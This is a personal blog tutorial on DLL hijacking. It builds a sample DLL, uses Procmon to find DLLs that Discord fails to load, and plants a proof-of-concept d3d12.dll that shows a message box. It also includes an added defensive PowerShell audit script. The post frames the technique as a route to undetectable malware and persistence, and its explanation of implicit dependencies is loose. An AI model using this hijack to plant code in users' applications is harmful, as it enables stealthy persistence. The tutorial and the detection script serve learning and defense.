Hijacking a DLL from Discord to achieve Command Execution
Introduction
I wrote this post a long time ago and didn't bother to check any of the information or writing, so don't take this post too seriously. Also, there is a chance that Discord has already fixed the stupid way they search for DLLs; in that case the post is outdated and not applicable anymore. Though I don't think this happened, because at the time I wrote this the flaw was already known but Discord deliberately chose not to fix it.
I saw @hackingnaweb creating a fully undetectable malware by hijacking a DLL that Discord uses, and it looked quite interesting. I still don't know if I'm going too deep into this, because I have almost a hundred projects that I started and then forgot about for some time for some reason.
What is a DLL?
So at the beginning I'm going to explain what DLLs are.
DLL stands for Dynamic-Link Library. DLLs are executable binaries like .exe files (both use the PE format), but a DLL is made to export data, code and functions for other programs to import, so it cannot run directly; it can also be shared and reused by multiple programs at the same time. When you compile a DLL, the compiler (at least in my case) creates two files: a .lib and a .dll.
~ .lib files are static libraries: when you import a function from a .lib file, the compiler links that function into your binary at compile time.
~ .dll files are dynamic (as the name says): when you import a function from a DLL, the compiler will NOT copy it into your binary; instead the function is loaded at execution time.
Creating and Loading a simple DLL
Now I'm going to create two DLLs: one without an entry point (like a main function) that just prints a message, and another with an entry point. Let's start.
I'm developing this on Linux and using a cross-compiler to build for Windows, because development on Windows sucks asf.
helloDll.cpp:

To compile (in my case) you will need a cross compiler; install one (mingw64) using your favorite package manager and compile your helloDll.cpp.
Compiling:

Now we have this helloDLL.o file; the .o extension means it's an object file (compiled code that still needs to be linked). The next step is to link the file.
Linking:

By now the DLL is done, but we also need the executable that will use it, so let's create it.
#include <stdio.h>
#include <windows.h>

int main() {
    // Load hello.dll with the default search behaviour (no extra flags).
    // Because no absolute path is given, the loader walks the standard search order.
    HMODULE const HelloDll = LoadLibraryExW(L"hello.dll", nullptr, 0);
    // error checking
    if (HelloDll == NULL) {
        puts("Couldn't find the dll. Exiting...");
        return 1;
    }
    // this 'using' declaration creates a type alias named GetGreetingType
    // matching the signature of the exported function
    using GetGreetingType = char const* (__cdecl*)();
    // look up the exported function's address and cast it to the alias defined above
    GetGreetingType const GetGreeting =
        reinterpret_cast<GetGreetingType>(GetProcAddress(HelloDll, "GetGreeting"));
    // GetProcAddress returns NULL when the export is missing; don't call a null pointer
    if (GetGreeting == nullptr) {
        puts("GetGreeting is not exported by this dll. Exiting...");
        FreeLibrary(HelloDll);
        return 1;
    }
    // call the function
    puts(GetGreeting());
    // unload the library and return
    FreeLibrary(HelloDll);
    return 0;
}
So this code is responsible for loading hello.dll using functions from <windows.h> and calling the function GetGreeting. I'm not going to go very deep into EVERY detail of this code, since the Win32 API can be very ugly sometimes, but I am going to talk about LoadLibrary. When you specify the DLL without giving the function an absolute path, it will search in this order:

There are Known DLLs that are exceptions, such as kernel32.dll, ntdll.dll and so on: when an executable asks for one of these, the loader knows exactly where to find them. A DLL, which is itself a dependency/library of a binary, can also have dependencies on other binaries. Our hello.dll depends on kernel32.dll because of the functions we are using.
Definition: An implicit dependency exists when a DLL relies on another resource or library without explicitly declaring it. The DLL infers this dependency by referencing the resource or library name within its code.
How it works: The operating system or loader typically tries to resolve these dependencies automatically. When the DLL code references another resource (like a function or variable), the system searches for a definition that matches the reference and links them together.
Example: Imagine a DLL (A) has code that calls a function named DoSomething without mentioning any specific library. If there's another DLL (B) that exports a function named DoSomething, the loader might implicitly assume A depends on B and link them together.
Compiling:

So now we are ready to test our hello.dll:

:) First DLL created. It's your turn to get more used to it and create your own DLL with an entry point.

Discord Dll Hijacking
Now, finally, I'm going to hijack that Discord DLL lol.
So, first of all, let's use Procmon to see what Discord tries to load when it starts.

You may be scared by this bunch of things. Procmon is like Task Manager but way better: it monitors everything that every process that is or was running is or was doing. Let's add some filters to find what we are looking for.
Then press Ctrl+F to open the Filter tab and add a filter to include only the Process Name Discord.exe (don't forget to run Discord after that).

A lot of stuff that is useless in our case will still be displayed, so I recommend adding these other filters.

That will display only DLLs that Discord has tried to find but couldn't for some reason. Like my sources for this "project", I will use d3d12.dll as well.

So you probably remember what a program does when it tries to load a DLL; in this case I'll create the missing d3d12.dll inside the Discord executable folder and hope that when I start Discord it gets executed.
I'll provide the code, but I'm just displaying a message box inside the main function to see if my code is running.
#include <windows.h>

// Entry point the loader calls when the DLL is attached to or detached from a
// process or thread. Each case ends with a break so only one box is shown per
// event. MessageBox from DllMain runs under the loader lock, which is fine for
// this quick check that the code executes but not something to keep in real code.
extern "C" BOOL WINAPI DllMain(HINSTANCE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        MessageBox(NULL,
                   TEXT("DLL Hijacking verified Process Attach!"),
                   TEXT("DLL Hijacking BVS"),
                   MB_ICONERROR | MB_OK);
        break;
    case DLL_THREAD_ATTACH:
        MessageBox(NULL,
                   TEXT("DLL Hijacking verified Thread Attach"),
                   TEXT("DLL Hijacking BVS"),
                   MB_ICONERROR | MB_OK);
        break;
    case DLL_THREAD_DETACH:
        MessageBox(NULL,
                   TEXT("DLL Hijacking verified Thread Detach"),
                   TEXT("DLL Hijack BVS"),
                   MB_ICONERROR | MB_OK);
        break;
    case DLL_PROCESS_DETACH:
        MessageBox(NULL,
                   TEXT("DLL Hijacking verified Process Detach"),
                   TEXT("DLL Hijack BVS"),
                   MB_ICONERROR | MB_OK);
        break;
    }
    return TRUE;
}
And there it is: Discord isn't crashing and our code is running :)
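As an added defensive check that is not part of the original post: the search-order discussion above explains why a DLL dropped in the application folder wins over the System32 copy for anything that is not a Known DLL, and the demo shows exactly that with d3d12.dll. This PowerShell script lists the modules of a running process that either shadow a System32 DLL name from a non-system directory or fail Authenticode validation. It assumes a Windows host, a process named Discord, and enough rights to read that process's module list.

```powershell
# Added example, not code from the original post. Audits a running process for DLLs
# that shadow a System32 DLL name from a non-system directory (the d3d12.dll case)
# or that fail Authenticode validation. Assumptions: Windows host, process name
# "Discord", and the shell can read the target process's module list.
param(
    [string]$ProcessName = 'Discord'
)

$system32   = [Environment]::GetFolderPath('System')       # e.g. C:\Windows\System32
$systemDirs = @($system32, (Join-Path $env:WINDIR 'SysWOW64'))

# Every DLL name that exists in System32. A same-named DLL loaded from anywhere
# else is a hijack candidate, because the application directory is searched first.
$systemNames = [System.Collections.Generic.HashSet[string]]::new()
Get-ChildItem -Path $system32 -Filter '*.dll' -File |
    ForEach-Object { [void]$systemNames.Add($_.Name.ToLowerInvariant()) }

$findings = foreach ($proc in Get-Process -Name $ProcessName -ErrorAction SilentlyContinue) {
    try { $modules = $proc.Modules } catch { continue }   # access denied or bitness mismatch
    foreach ($mod in $modules) {
        $path = $mod.FileName
        if (-not $path) { continue }
        $dir  = Split-Path -Path $path -Parent
        $name = (Split-Path -Path $path -Leaf).ToLowerInvariant()

        $inSystemDir   = [bool]($systemDirs | Where-Object { $dir -like "$_*" })
        $shadowsSystem = (-not $inSystemDir) -and $systemNames.Contains($name)
        $signature     = Get-AuthenticodeSignature -FilePath $path

        if ($shadowsSystem -or $signature.Status -ne 'Valid') {
            [pscustomobject]@{
                ProcessId     = $proc.Id
                Module        = $name
                Path          = $path
                ShadowsSystem = $shadowsSystem   # name exists in System32 but was loaded elsewhere
                Signature     = $signature.Status
            }
        }
    }
}

$findings | Sort-Object -Property ShadowsSystem -Descending | Format-Table -AutoSize
```

Unsigned DLLs that ship with the application will also be listed, so the ShadowsSystem column is the stronger signal; a d3d12.dll path under the Discord install folder is the exact situation this post demonstrates.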

Sources
MitchHS, GitHub: Discord DLL Hijacking
Bob Van, Infosec: DLL Hijacking Persistence
CppCon talk about DLLs
https://s1gh.sh/discord-dll-hijacking-persistence/
https://www.youtube.com/watch?v=3eROsG_WNpE
